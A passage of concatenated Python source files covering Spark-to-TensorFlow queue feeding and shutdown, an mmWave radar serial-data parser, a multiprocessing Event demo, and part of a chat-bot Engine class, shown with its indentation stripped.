except (AttributeError, KeyError):
msg = "Queue '{}' not found on this node, check for exceptions on other nodes.".format(qname)
raise Exception(msg)
state = str(mgr.get('state'))
logger.info("mgr.state={0}".format(state))
terminating = state == "'terminating'"
if terminating:
logger.info("mgr is terminating, skipping partition")
count = sum(1 for item in iter)
logger.info("Skipped {0} items from partition".format(count))
else:
logger.info("Feeding partition {0} into {1} queue {2}".format(iter, qname, queue))
count = 0
for item in iter:
count += 1
queue.put(item, block=True)
# wait for consumers to finish processing all items in queue before "finishing" this iterator
joinThr = Thread(target=queue.join)
joinThr.start()
timeout = feed_timeout
while (joinThr.isAlive()):
if (not equeue.empty()):
e_str = equeue.get()
raise Exception("Exception in worker:\n" + e_str)
time.sleep(1)
timeout -= 1
if timeout <= 0:
raise Exception("Timeout while feeding partition")
logger.info("Processed {0} items in partition".format(count))
# check if TF is terminating feed after this partition
if not terminating:
state = str(mgr.get('state'))
terminating = state == "'terminating'"
if terminating:
try:
logger.info("TFSparkNode: requesting stop")
client = reservation.Client(cluster_meta['server_addr'])
client.request_stop()
client.close()
except Exception as e:
# ignore any errors while requesting stop
logger.debug("Error while requesting stop: {0}".format(e))
return [terminating]
return _train
def inference(cluster_info, feed_timeout=600, qname='input'):
"""Feeds Spark partitions into the shared multiprocessing.Queue and returns inference results.
Args:
:cluster_info: node reservation information for the cluster (e.g. host, executor_id, pid, ports, etc)
:feed_timeout: number of seconds after which data feeding times out (600 sec default)
:qname: *INTERNAL_USE*
Returns:
A dataRDD.mapPartitions() function
"""
def _inference(iter):
# get shared queue, reconnecting if necessary
mgr = _get_manager(cluster_info, util.get_ip_address(), util.read_executor_id())
try:
queue_in = mgr.get_queue(qname)
equeue = mgr.get_queue('error')
except (AttributeError, KeyError):
msg = "Queue '{}' not found on this node, check for exceptions on other nodes.".format(qname)
raise Exception(msg)
logger.info("Feeding partition {0} into {1} queue {2}".format(iter, qname, queue_in))
count = 0
for item in iter:
count += 1
queue_in.put(item, block=True)
# signal "end of partition"
queue_in.put(marker.EndPartition())
# skip empty partitions
if count == 0:
return []
# wait for consumers to finish processing all items in queue before "finishing" this iterator
joinThr = Thread(target=queue_in.join)
joinThr.start()
timeout = feed_timeout
while (joinThr.isAlive()):
if (not equeue.empty()):
e_str = equeue.get()
raise Exception("Exception in worker:\n" + e_str)
time.sleep(1)
timeout -= 1
if timeout <= 0:
raise Exception("Timeout while feeding partition")
logger.info("Processed {0} items in partition".format(count))
# read result queue
results = []
queue_out = mgr.get_queue('output')
while count > 0:
result = queue_out.get(block=True)
results.append(result)
count -= 1
queue_out.task_done()
logger.info("Finished processing partition")
return results
return _inference
def shutdown(cluster_info, grace_secs=0, queues=['input']):
"""Stops all TensorFlow nodes by feeding ``None`` into the multiprocessing.Queues.
Args:
:cluster_info: node reservation information for the cluster (e.g. host, executor_id, pid, ports, etc).
:queues: *INTERNAL_USE*
Returns:
A nodeRDD.mapPartitions() function
"""
def _shutdown(iter):
host = util.get_ip_address()
executor_id = util.read_executor_id()
# reconnect to shared queue
mgr = _get_manager(cluster_info, host, executor_id)
# send SIGTERM to Tensorboard proc (if running)
for node in cluster_info:
if node['host'] == host and node['executor_id'] == executor_id:
tb_pid = node['tb_pid']
if tb_pid != 0:
logger.info("Stopping tensorboard (pid={0})".format(tb_pid))
subprocess.Popen(["kill", str(tb_pid)])
# terminate any listening queues
logger.info("Stopping all queues")
for q in queues:
if q != 'error':
try:
queue = mgr.get_queue(q)
logger.info("Feeding None into {0} queue".format(q))
queue.put(None, block=True)
except (AttributeError, KeyError):
msg = "Queue '{}' not found on this node, check for exceptions on other nodes.".format(q)
raise Exception(msg)
# wait for grace period (after terminating feed queues)
if grace_secs > 0:
logger.info("Waiting for {} second grace period".format(grace_secs))
time.sleep(grace_secs)
# then check for any late exceptions
equeue = mgr.get_queue('error')
if (not equeue.empty()):
# note: "peek" this queue, since otherwise Spark might retry this "failed" task, find no errors in queue, and finish the job with SUCCESS
e_str = equeue.get()
equeue.put(e_str)
raise Exception("Exception in worker:\n" + e_str)
logger.info("Setting mgr.state to 'stopped'")
mgr.set('state', 'stopped')
return [True]
return _shutdown
|
14_mmw.py
|
#
# Copyright (c) 2018, Manfred Constapel
# This file is licensed under the terms of the MIT license.
#
#
# TI IWR1443 ES2.0 EVM @ mmWave SDK demo of SDK 1.2.0.5
# TI IWR1443 ES3.0 EVM @ mmWave SDK demo of SDK 2.1.0.4
#
import sys
import json
import serial
import threading
from lib.shell import *
from lib.helper import *
from lib.utility import *
# ------------------------------------------------
_meta_ = {
'mss': 'MMW Demo',
'dev': ('xWR14xx',),
'ver': ('01.02.00.05', '02.01.00.04',),
'cli': 'mmwDemo:/>',
'seq': b'\x02\x01\x04\x03\x06\x05\x08\x07',
'blk': 32,
'aux': 921600,
'ant': (4, 3),
'app': {
'rangeProfile': ('plot_range_profile', 'capture_range_profile', 'monitor_activity', ),
'noiseProfile': ('plot_range_profile', ),
'detectedObjects': ('plot_detected_objects', 'simple_cfar_clustering', ),
'rangeAzimuthHeatMap': ('plot_range_azimuth_heat_map', ),
'rangeDopplerHeatMap': ('plot_range_doppler_heat_map', )
}
}
# ------------------------------------------------
apps = {}
verbose = False
# ------------------------------------------------
def _read_(dat, target=sys.stdout):
target.write(dat)
target.flush()
for ver in _meta_['ver']:
for dev in _meta_['dev']:
if all((tag in dat for tag in (dev, _meta_['mss'], ver))):
return dev # reset detected
if _meta_['cli'] in dat: return (None,) # cli ready
return () # unknown state
def _init_(prt, dev, cfg, dat):
aux = serial.Serial(dat, _meta_['aux'], timeout=0.01)
taux = threading.Thread(target=_data_, args=(aux,))
taux.start()
def _conf_(cfg):
global verbose
c = dict(cfg)
p = {'loglin': float('nan'), 'fftcomp': float('nan'), 'rangebias': float('nan')}
if '_comment_' in c:
c.pop('_comment_', None) # remove entry
if '_apps_' in c:
_meta_['app'] = c['_apps_']
c.pop('_apps_', None) # remove entry
if '_settings_' in c:
rx_ant = int(c['_settings_']['rxAntennas'])
tx_ant = int(c['_settings_']['txAntennas'])
# common
if c['channelCfg']['rxMask'] is None:
c['channelCfg']['rxMask'] = 2**rx_ant - 1
if c['channelCfg']['txMask'] is None:
n = tx_ant
if n == 1: n = 0
else: n = 2 * n
c['channelCfg']['txMask'] = 1 + n
if c['channelCfg']['cascading'] is None:
c['channelCfg']['cascading'] = 0 # always 0
# range bias for post-processing
if 'rangeBias' not in c['_settings_'] or c['_settings_']['rangeBias'] is None:
c['_settings_']['rangeBias'] = 0
# range bias for pre-processing
if 'compRangeBiasAndRxChanPhase' in c:
if c['compRangeBiasAndRxChanPhase']['rangeBias'] is None:
c['compRangeBiasAndRxChanPhase']['rangeBias'] = c['_settings_']['rangeBias']
if c['compRangeBiasAndRxChanPhase']['phaseBias'] is None or \
type(c['compRangeBiasAndRxChanPhase']['phaseBias']) == list and \
len(c['compRangeBiasAndRxChanPhase']['phaseBias']) == 0:
c['compRangeBiasAndRxChanPhase']['phaseBias'] = [1, 0] * _meta_['ant'][0] * _meta_['ant'][1]
# cli output
if 'verbose' in c['_settings_'] and c['_settings_']['verbose'] is not None:
verbose = c['_settings_']['verbose']
if c['dfeDataOutputMode']['type'] is None:
c['dfeDataOutputMode']['type'] = 1 # legacy (no subframes)
if c['adcCfg']['adcBits'] is None:
c['adcCfg']['adcBits'] = 2 # 16 bit
log_lin_scale = 1.0 / 512
if num_tx_elev_antenna(c) == 1: log_lin_scale = log_lin_scale * 4.0 / 3 # MMWSDK-439
fft_scale_comp_1d = fft_doppler_scale_compensation(32, num_range_bin(c))
fft_scale_comp_2d = 1;
fft_scale_comp = fft_scale_comp_2d * fft_scale_comp_1d
p['log_lin'], p['fft_comp'], p['range_bias'] = log_lin_scale, fft_scale_comp, c['_settings_']['rangeBias']
c.pop('_settings_', None) # remove entry
return c, p
def _proc_(cfg, par, err={1: 'miss', 2: 'exec', 3: 'plot'}):
global apps
for _, app in apps.items(): app.kill()
apps.clear()
for cmd, app in _meta_['app'].items():
if type(app) not in (list, tuple): app = (app,)
for item in app:
if cmd in cfg['guiMonitor'] and cfg['guiMonitor'][cmd] == 1 and item is not None:
if item not in apps:
apps[item], values = exec_app(item, (cfg, par, ))
if values is None: values = []
code = apps[item].poll()
if code is None:
print_log(item, values)
tapp = threading.Thread(target=_grab_, args=(item,))
tapp.start()
else:
print_log(item, values, RuntimeError(err[code]))
def _pipe_(dat):
for tag in apps:
if apps[tag] is None: continue
try:
apps[tag].stdin.write(str.encode(dat + '\n'))
apps[tag].stdin.flush()
except Exception as e:
print_log(e, sys._getframe(), tag)
apps[tag].kill()
apps[tag] = None
def _grab_(tag):
try:
while True:
line = apps[tag].stderr.readline()
if line:
line = line.decode('latin-1')
print_log(None, tag, line.strip())
except:
pass
# ------------------------------------------------
def _data_(prt): # observe auxiliary port and process incoming data
if not prt.timeout:
raise TypeError('no timeout for serial port provided')
input, output, sync, size = {'buffer': b''}, {}, False, _meta_['blk']
while True:
try:
data = prt.read(size)
input['buffer'] += data
if data[:len(_meta_['seq'])] == _meta_['seq']: # check for magic sequence
if len(output) > 0:
plain = json.dumps(output)
_pipe_(plain)
if verbose:
print(plain, file=sys.stdout, flush=True) # print output to stdout
input['buffer'] = data
input['blocks'] = -1
input['address'] = 0
input['values'] = 0
input['other'] = {}
output = {}
sync = True # very first frame in the stream was seen
if sync:
flen = 0
while flen < len(input['buffer']): # keep things finite
flen = len(input['buffer'])
aux_buffer(input, output) # do processing of captured bytes
except serial.serialutil.SerialException:
return # leave thread
except Exception as e:
print_log(e, sys._getframe())
# ------------------------------------------------
def aux_buffer(input, output, head=36, indices={
1: 'detected_points', 2: 'range_profile', 3: 'noise_profile',
4: 'azimuth_static', 5: 'range_doppler', 6: 'stats', 7: 'side_info'}):
def aux_head(dat, n=head):
m = dat[ 0: 8]
v = intify(dat[ 8:12], 10)
l = intify(dat[12:16])
d = intify(dat[16:20], 10)
f = intify(dat[20:24])
t = intify(dat[24:28])
o = intify(dat[28:32])
s = intify(dat[32: n])
return n, v, l, d, f, t, o, s
def aux_struct(dat, n=8):
t = intify(dat[ 0: 4])
l = intify(dat[ 4: n])
return n, t, l // 2
def aux_descriptor(dat, n=4): # descriptor for detected points/objects
o = intify(dat[ 0: 2])
q = intify(dat[ 2: n])
return n, o, q
def aux_object(dat, oth, n=12): # detected points/objects
ri = intify(dat[ 0: 2]) # range index
di = intify(dat[ 2: 4]) # Doppler index
if di > 32767: di -= 65536
di = -di # circular shifted fft bins
p = intify(dat[ 4: 6]) # Doppler peak value
x = intify(dat[ 6: 8])
y = intify(dat[ 8:10])
z = intify(dat[10: n])
if x > 32767: x -= 65536
if y > 32767: y -= 65536
if z > 32767: z -= 65536
qfrac = 0
if 'qfrac' in oth: qfrac = oth['qfrac'] # q-notation is used
x = q_to_dec(x, qfrac)
y = q_to_dec(y, qfrac)
z = q_to_dec(z, qfrac)
return n, ri, di, p, x, y, z
def aux_profile(dat, n=2): # value of range or noise profile
v = intify(dat[ 0: n])
return n, v
def aux_heatmap(dat, sgn, n=2): # value for heatmaps
v = intify(dat[ 0: n])
if sgn and v > 32767: v -= 65536
return n, v
def aux_info(dat, n=24): # performance measures and statistical data
ifpt = intify(dat[ 0: 4])
tot = intify(dat[ 4: 8])
ifpm = intify(dat[ 8:12])
icpm = intify(dat[12:16])
afpl = intify(dat[16:20])
ifpl = intify(dat[20: n])
return n, ifpt, tot, ifpm, icpm, afpl, ifpl
# ----------
buffer, blocks, address, values, other = \
input['buffer'], input['blocks'], input['address'], input['values'], input['other']
def progress(n, block, value):
nonlocal buffer, values, address
buffer = buffer[n:]
values -= 1
if values == 0: address = 0
try:
output[block].append(value)
except:
try:
output[block][value[0]] = value[1]
except:
output[block] = value
# ----------
# 6) statistics (raw values)
if address == 6 and len(buffer) >= 24 and values > 0:
n, ifpt, tot, ifpm, icpm, afpl, ifpl = aux_info(buffer)
progress(n, indices[address], {
'interframe_processing': ifpt,
'transmit_output': tot,
'processing_margin': {
'interframe': ifpm,
'interchirp': icpm},
'cpu_load': {
'active_frame': afpl,
'interframe': ifpl}
})
# 5) range-doppler heatmap: entire, 2D, log mag range/Doppler array
while address == 5 and len(buffer) >= 2 and values > 0:
n, v = aux_heatmap(buffer, False)
progress(n, indices[address], v)
# 4) range-azimuth heatmap: azimuth data from the radar cube matrix
while address == 4 and len(buffer) >= 2 and values > 0:
n, v = aux_heatmap(buffer, True)
progress(n, indices[address], v)
# 3) 1D array of data considered “noise”
while address == 3 and len(buffer) >= 2 and values > 0:
n, v = aux_profile(buffer)
progress(n, indices[address], q_to_db(v))
# 2) 1D array of log mag range ffts – i.e. the first column of the log mag range-Doppler matrix
while address == 2 and len(buffer) >= 2 and values > 0:
n, v = aux_profile(buffer)
progress(n, indices[address], q_to_db(v))
# 1b) object detection
while address == 1 and len(buffer) >= 12 and values > 0:
n, r, d, p, x, y, z = aux_object(buffer, other)
progress(n, indices[address], ('{},{}'.format(r, d), {'v': p, 'x': x, 'y': y, 'z': z}))
# ----------
# 1a) object detection descriptor
if address == 1 and len(buffer) >= 4 and values == 0:
n, o, q = aux_descriptor(buffer)
buffer = buffer[n:]
values = o
other['qfrac'] = q
# 0b) segment
if address == 0 and len(buffer) >= 8 and blocks > 0:
n, address, values = aux_struct(buffer)
buffer = buffer[n:]
if address == 1: values = 0
blocks -= 1
if address in (1, ):
output[indices[address]] = {}
elif address in (2, 3, 4, 5, ):
output[indices[address]] = []
elif address in (6, ):
output[indices[address]] = None
# 0a) header
if address == 0 and len(buffer) >= head and blocks == -1:
n, v, l, d, f, t, o, s = aux_head(buffer)
buffer = buffer[n:]
blocks = s
output['header'] = {'version': v, 'length': l, 'platform': d, 'number': f, 'time': t, 'objects': o, 'blocks': s}
# ----------
input['buffer'] = buffer
input['blocks'] = blocks
input['address'] = address
input['values'] = values
input['other'] = other
|
fc_2015_04_25.py
|
#!/usr/bin/env python3
# imports go here
import multiprocessing
import time
#
# Free Coding session for 2015-04-25
# Written by Matt Warren
#
def wait_for_event(e):
print("waiting")
e.wait()
print("got event")
def wait_for_event_timeout(e, t):
print("wait for timeout")
e.wait(t)
print("event timeout set", e.is_set())
if __name__ == '__main__':
e = multiprocessing.Event()
w1 = multiprocessing.Process(name='block', target=wait_for_event, args=(e,))
w1.start()
w2 = multiprocessing.Process(name='non-block', target=wait_for_event_timeout, args=(e, 2))
w2.start()
print('waiting before calling set')
time.sleep(3)
e.set()
print('event set')
|
engine.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from multiprocessing import Process, Queue
from six import string_types
import sys
import time
import yaml
import weakref
from .bot import ShellBot
from .bus import Bus
from .context import Context
from .i18n import _, localization as l10n
from .lists import ListFactory
from .listener import Listener
from .observer import Observer
from .routes.wrapper import Wrapper
from .server import Server
from .shell import Shell
from .spaces import SpaceFactory
from .speaker import Speaker
from .stores import StoreFactory
class Engine(object):
"""
Powers multiple bots
The engine manages the infrastructure that is used accross multiple
bots acting in multiple spaces. It is made of an extensible set of
components that share the same context, that is, configuration settings.
Shellbot allows the creation of bots with a given set of commands.
Each bot instance is bonded to a single chat space. The chat space can be
either created by the bot itself, or the bot can join an existing space.
The first use case is adapted when a collaboration space is created for
semi-automated interactions between human and machines.
In the example below, the bot controls the entire life cycle of the chat
space. A chat space is created when the program is launched. And it is
deleted when the program is stopped.
Example of programmatic chat space creation::
from shellbot import Engine, ShellBot, Context, Command
Context.set_logger()
# create a bot and load command
#
class Hello(Command):
keyword = 'hello'
information_message = u"Hello, World!"
engine = Engine(command=Hello(), type='spark')
# load configuration
#
engine.configure()
# create a chat space, or connect to an existing one
# settings of the chat space are provided
# in the engine configuration itself
#
engine.bond(reset=True)
# run the engine
#
engine.run()
# delete the chat channel when the engine is stopped
#
engine.dispose()
A second interesting use case is when a bot is invited to an existing chat
space. On such an event, a new bot instance can be created and bonded
to the chat space.
Example of invitation to a chat space::
def on_enter(self, channel_id):
bot = engine.get_bot(channel_id=channel_id)
The engine is configured by setting values in the context that is attached
to it. This is commonly done by loading the context with a dict before the
creation of the engine itself, as in the following example::
context = Context({
'bot': {
'on_enter': 'You can now chat with Batman',
'on_exit': 'Batman is now quitting the channel, bye',
},
'server': {
'url': 'http://d9b62df9.ngrok.io',
'hook': '/hook',
},
})
engine = Engine(context=context)
engine.configure()
Please note that the configuration is checked and actually used on the
call ``engine.configure()``, rather on the initialisation itself.
When configuration statements have been stored in a separate text file
in YAML format, then the engine can be initialised with an empty context,
and configuration is loaded afterwards.
Example::
engine = Engine()
engine.configure_from_path('/opt/shellbot/my_bot.yaml')
When no configuration is provided to the engine, then default settings
are considered for the engine itself, and for various components.
For example, for a basic engine interacting in a Cisco Spark channel::
engine = Engine(type='spark')
engine.configure()
When no indication is provided at all, the engine loads a space of type
'local'.
So, in other terms::
engine = Engine()
engine.configure()
is strictly equivalent to::
engine = Engine('local')
engine.configure()
In principle, the configuration of the engine is set once for the full
life of the instance. This being said, some settings can be changed
globally with the member function `set()`. For example::
engine.set('bot.on_banner': 'Hello, I am here to help')
"""
DEFAULT_SETTINGS = {
'bot': {
'banner.text': '$BOT_BANNER_TEXT',
'banner.content': '$BOT_BANNER_CONTENT',
'banner.file': '$BOT_BANNER_FILE',
'on_enter': '$BOT_ON_ENTER',
'on_exit': '$BOT_ON_EXIT',
},
}
def __init__(self,
context=None,
settings={},
configure=False,
mouth=None,
ears=None,
fan=None,
space=None,
type=None,
server=None,
store=None,
command=None,
commands=None,
driver=ShellBot,
machine_factory=None,
updater_factory=None,
preload=0,
):
"""
Powers multiple bots
:param context: Data shared across engine components
:type context: Context
:param settings: Configuration settings to apply
:type settings: dict
:param configure: Check configuration on initialisation
:type configure: False (the default) or True
:param mouth: For asynchronous outbound to the chat space
:type mouth: Queue
:param ears: For asynchronous inbound from the chat space
:type ears: Queue
:param fan: For asynchronous audit of the chat space
:type fan: Queue
:param type: Chat space to load for this engine. Default to 'local'
:type type: str
:param space: Chat space to be used by this engine
:type space: Space
:param server: Web server to be used by this engine
:type server: Server
:param command: A command to initialize the shell
:type command: str or Command
:param commands: A list of commands to initialize the shell
:type commands: list of str, or list of Command
:param driver: Instantiated for every new bot
:type driver: class
:param machine_factory: Provides a state machine for each bot
:type machine_factory: MachineFactory
:param updater_factory: Provides an updater for an audited channel
:type updater_factory: UpdaterFactory
:param preload: Number of existing bots to preload
:type preload: int
If a chat type is provided, e.g., 'spark', then one space instance is
loaded from the SpaceFactory. Else a space of type 'local' is used.
Example::
engine = Engine(type='spark')
There is also an option to inject a pre-existing space. This can be
useful for testing purpose, or for similar advanced usage.
Example::
my_space = MySpecialSpace( ... )
engine = Engine(space=my_space)
"""
self.context = context if context else Context()
l10n.context = self.context
self.mouth = mouth
self.speaker = Speaker(engine=self)
self.ears = ears
self.listener = Listener(engine=self)
self.fan = fan
self.observer = Observer(engine=self)
self.registered = {
'bond': [], # connected to a channel
'dispose': [], # channel will be destroyed
'start': [], # starting bot services
'stop': [], # stopping bot services
'message': [], # message received (with message)
'join': [], # joining a space (with person)
'leave': [], # leaving a space (with person)
'enter': [], # invited to a space (for the bot)
'exit': [], # kicked off from a space (for the bot)
'inbound': [], # other event received from space (with event)
}
self.bots = {}
self.bots_to_load = set() # for bots created before the engine runs
assert space is None or type is None # use only one
if space:
self.space = space
elif type:
self.space = SpaceFactory.get(type=type)
else:
self.space = SpaceFactory.get(type='local')
self.space.context = self.context
self.server = server
self.shell = Shell(engine=self)
if configure or settings:
self.configure(settings)
if commands:
self.load_commands(commands)
if command:
self.load_command(command)
self.driver = driver if driver else ShellBot
self.machine_factory = machine_factory
self.updater_factory = updater_factory
assert preload >= 0
self.preload = preload
def configure_from_path(self, path="settings.yaml"):
"""
Reads configuration information
:param path: path to the configuration file
:type path: str
The function loads configuration from the file and from the
environment. Port number can be set from the command line.
"""
logging.info(u"Loading configuration")
logging.info(u"- from '{}'".format(path))
with open(path, 'r') as stream:
self.configure_from_file(stream)
def configure_from_file(self, stream):
"""
Reads configuration information
:param stream: the handle that contains configuration information
:type stream: file
The function loads configuration from the file and from the
environment. Port number can be set from the command line.
"""
try:
settings = yaml.load(stream)
except Exception as feedback:
logging.error(feedback)
raise Exception(u"Unable to load valid YAML settings")
self.configure(settings=settings)
def configure(self, settings={}):
"""
Checks settings
:param settings: configuration information
:type settings: dict
If no settings is provided, and the context is empty, then
``self.DEFAULT_SETTINGS`` and ``self.space.DEFAULT_SETTINGS``
are used instead.
"""
self.context.apply(settings)
if self.context.is_empty:
self.context.apply(self.DEFAULT_SETTINGS)
self.context.apply(self.space.DEFAULT_SETTINGS)
self.check()
if (self.server is None
and self.get('server.binding') is not None):
logging.debug(u"Adding web server")
self.server = Server(context=self.context, check=True)
self.space.ears = self.ears
self.space.configure()
self.space.connect()
self.register('start', self.space)
self.register('stop', self.space)
self.list_factory = ListFactory(self.context)
self.list_factory.configure()
self.shell.configure()
self.bus = Bus(self.context)
self.bus.check()
self.publisher = self.bus.publish()
def check(self):
"""
Checks settings of the engine
:param settings: a dictionary with some statements for this instance
:type settings: dict
This function reads key ``bot`` and below, and update
the context accordingly.
Example::
context = Context({
'bot': {
'on_enter': 'You can now chat with Batman',
'on_exit': 'Batman is now quitting the channel, bye',
},
'server': {
'url': 'http://d9b62df9.ngrok.io',
'hook': '/hook',
},
})
engine = Engine(context=context)
engine.check()
"""
self.context.check('bot.banner.text', filter=True)
self.context.check('bot.banner.content', filter=True)
self.context.check('bot.banner.file', filter=True)
self.context.check('bot.on_enter', filter=True)
self.context.check('bot.on_exit', filter=True)
def get(self, key, default=None):
"""
Retrieves the value of one configuration key
:param key: name of the value
:type key: str
:param default: default value
:type default: any serializable type is accepted
:return: the actual value, or the default value, or None
Example::
message = engine.get('bot.on_start')
This function is safe on multiprocessing and multithreading.
"""
return self.context.get(key, default)
def set(self, key, value):
"""
Changes the value of one configuration key
:param key: name of the value
:type key: str
:param value: new value
:type value: any serializable type is accepted
Example::
engine.set('bot.on_start', 'hello world')
This function is safe on multiprocessing and multithreading.
"""
self.context.set(key, value)
@property
def name(self):
"""
Retrieves the dynamic name of this bot
:return: The value of ``bot.name`` key in current context
:rtype: str
"""
return self.get('bot.name', _('Shelly'))
@property
def version(self):
"""
Retrieves the version of this bot
:return: The value of ``bot.version`` key in current context
:rtype: str
"""
return self.get('bot.version', _('*unknown*'))
def register(self, event, instance):
"""
Registers an object to process an event
:param event: label, such as 'start' or 'bond'
:type event: str
:param instance: an object that will handle the event
:type instance: object
This function is used to propagate events to any module
that may need it via callbacks.
On each event, the engine will look for a related member function
in the target instance and call it. For example for the event
'start' it will look for the member function 'on_start', etc.
Following standard events can be registered:
- 'bond' - when the bot has connected to a chat channel
- 'dispose' - when resources, including chat space, will be destroyed
- 'start' - when the engine is started
- 'stop' - when the engine is stopped
- 'join' - when a person is joining a space
- 'leave' - when a person is leaving a space
Example::
def on_init(self):
self.engine.register('bond', self) # call self.on_bond()
self.engine.register('dispose', self) # call self.on_dispose()
If the function is called with an unknown label, then a new list
of registered callbacks will be created for this event. Therefore the
engine can be used for the dispatching of any custom event.
Example::
self.engine.register('input', processor) # for processor.on_input()
...
received = 'a line of text'
self.engine.dispatch('input', received)
Registration uses weakref so that it affords the unattended deletion
of registered objects.
"""
logging.debug(u"Registering to '{}' dispatch".format(event))
assert event
assert isinstance(event, string_types)
if event not in self.registered.keys():
self.registered[event] = []
name = 'on_' + event
callback = getattr(instance, name)
assert callable(callback) # ensure the event is supported
handle = weakref.proxy(instance)
self.registered[event].append(handle)
if len(self.registered[event]) > 1:
logging.debug(u"- {} objects registered to '{}'".format(
len(self.registered[event]), event))
else:
logging.debug(u"- 1 object registered to '{}'".format(event))
def dispatch(self, event, **kwargs):
"""
Triggers objects that have registered to some event
:param event: label of the event
:type event: str
Example::
def on_bond(self):
self.dispatch('bond', bot=this_bot)
For each registered object, the function will look for a related member
function and call it. For example for the event
'bond' it will look for the member function 'on_bond', etc.
Dispatch uses weakref so that it affords the unattended deletion
of registered objects.
"""
assert event in self.registered.keys() # avoid unknown event type
if len(self.registered[event]) > 1:
logging.debug(u"Dispatching '{}' to {} objects".format(
event, len(self.registered[event])))
elif len(self.registered[event]) > 0:
logging.debug(u"Dispatching '{}' to 1 object".format(event))
else:
logging.debug(u"Dispatching '{}', nothing to do".format(event))
return
name = 'on_' + event
for handle in self.registered[event]:
try:
callback = getattr(handle, name)
callback(**kwargs)
except ReferenceError:
logging.debug(u"- registered object no longer exists")
def load_commands(self, *args, **kwargs):
"""
Loads commands for this bot
This function is a convenient proxy for the underlying shell.
"""
self.shell.load_commands(*args, **kwargs)
def load_command(self, *args, **kwargs):
"""
Loads one commands for this bot
This function is a convenient proxy for the underlying shell.
"""
self.shell.load_command(*args, **kwargs)
def hook(self, server=None):
"""
Connects this engine with back-end API
:param server: web server to be used
:type server: Server
This function adds a route to the provided server, and
asks the back-end service to send messages there.
"""
if server is not None:
logging.debug('Adding hook route to web server')
server.add_route(
Wrapper(callable=self.get_hook(),
route=self.context.get('server.hook', '/hook')))
if (self.context.get('server.binding') is not None
and self.context.get('server.url') is not None):
self.space.register(
hook_url=self.context.get('server.url')
+ self.context.get('server.hook', '/hook'))
def get_hook(self):
"""
Provides the hooking function to receive messages from Cisco Spark
"""
return self.space.webhook
def run(self, server=None):
"""
Runs the engine
:param server: a web server
:type server: Server
If a server is provided, it is ran in the background. A server could
also have been provided during initialisation, or loaded
during configuration check.
If no server instance is available, a loop is started
to fetch messages in the background.
In both cases, this function does not return, except on interrupt.
"""
if server is None:
server = self.server
self.start()
self.hook(server=server)
if server is None:
self.space.run()
else:
p = Process(target=server.run)
p.daemon = True
p.start()
self._server_process = p
try:
self._server_process.join()
except KeyboardInterrupt:
logging.error(u"Aborted by user")
self.stop()
def start(self):
"""
Starts the engine
"""
logging.warning(u'Starting the bot')
for channel in self.space.list_group_channels(quantity=self.preload):
self.bots_to_load.add(channel.id) # handled by the listener
if self.mouth is None:
self.mouth = Queue()
if self.ears is None:
self.ears = Queue()
self.space.ears = self.ears
if self.fan is None and self.updater_factory:
self.fan = Queue()
self.space.fan = self.fan
self.start_processes()
self.on_start()
self.dispatch('start')
def start_processes(self):
"""
Starts the engine processes
This function starts a separate process for each
main component of the architecture: listener, speaker, etc.
"""
self.context.set('general.switch', 'on')
self.speaker.start()
self.listener.start()
self.publisher.start()
self.observer.start()
def on_start(self):
"""
Does additional stuff when the engine is started
Provide your own implementation in a sub-class where required.
"""
pass
def stop(self):
"""
Stops the engine
This function changes in the context a specific key that is monitored
by bot components.
"""
logging.warning(u'Stopping the bot')
self.dispatch('stop')
self.on_stop()
logging.debug(u"Switching off")
self.context.set('general.switch', 'off')
time.sleep(1)
try:
self.listener.join()
except AssertionError:
pass # if listener process was not started
def on_stop(self):
"""
Does additional stuff when the engine is stopped
Provide your own implementation in a sub-class where required.
Note that some processes may have been killed at the moment of this
function call. This is likely to happen when end-user hits Ctl-C on
the keyboard for example.
"""
pass
def bond(self,
title=None,
reset=False,
participants=None,
**kwargs):
"""
Bonds to a channel
:param title: title of the target channel
:type: title: str
:param reset: if True, delete previous channel and re-create one
:type reset: bool
:param participants: the list of initial participants (optional)
:type participants: list of str
:return: Channel or None
This function creates a channel, or connect to an existing one.
If no title is provided, then the generic title configured for the
underlying space is used instead.
For example::
channel = engine.bond('My crazy channel')
if channel:
...
Note: this function asks the listener to load a new bot in its cache
on successful channel creation or lookup. In other terms, this function
can be called safely from any process for the creation of a channel.
"""
if not title:
title=self.space.configured_title()
logging.debug(u"Bonding to channel '{}'".format(title))
channel = self.space.get_by_title(title=title)
if channel and not reset:
logging.debug(u"- found existing channel")
# ask explicitly the listener to load the bot
if self.ears is None:
self.ears = Queue()
self.space.ears = self.ears
else:
if channel and reset:
logging.debug(u"- deleting existing channel")
self.space.delete(id=channel.id)
logging.debug(u"- creating channel '{}'".format(title))
channel = self.space.create(title=title, **kwargs)
if not channel:
logging.error("Unable to create channel")
return
if not participants:
participants = self.space.context.get('space.participants', [])
self.space.add_participants(id=channel.id, persons=participants)
self.bots_to_load.add(channel.id) # handled by the listener
return channel
def dispose(self,
title=None,
**kwargs):
"""
Destroys a named channel
:param title: title of the target channel
:type: title: str
"""
if not title:
title=self.space.configured_title()
logging.debug(u"Disposing channel '{}'".format(title))
channel = self.space.get_by_title(title=title)
if channel:
self.space.delete(id=channel.id, **kwargs)
def enumerate_bots(self):
"""
Enumerates all bots
"""
for id in self.bots.keys():
yield self.bots[id]
def get_bot(self, channel_id=None, **kwargs):
"""
Gets a bot by id
:param channel_id: The unique id of the target chat space
:type channel_id: str
:return: a bot instance, or None
This function receives the id of a chat space, and returns
the related bot.
If no id is provided, then the underlying space is asked to provide
with a default channel, as set in overall configuration.
Note: this function should not be called from multiple processes,
because this would create one bot per process. Use the function
``engine.bond()`` for the creation of a new channel.
"""
if not channel_id:
channel = self.bond(**kwargs)
if not channel:
return
channel_id = channel.id
logging.debug(u"Getting bot {}".format(channel_id))
if channel_id and channel_id in self.bots.keys():
logging.debug(u"- found matching bot instance")
return self.bots[channel_id]
bot = self.build_bot(id=channel_id, driver=self.driver)
if bot and bot.id:
logging.debug(u"- remembering bot {}".format(bot.id))
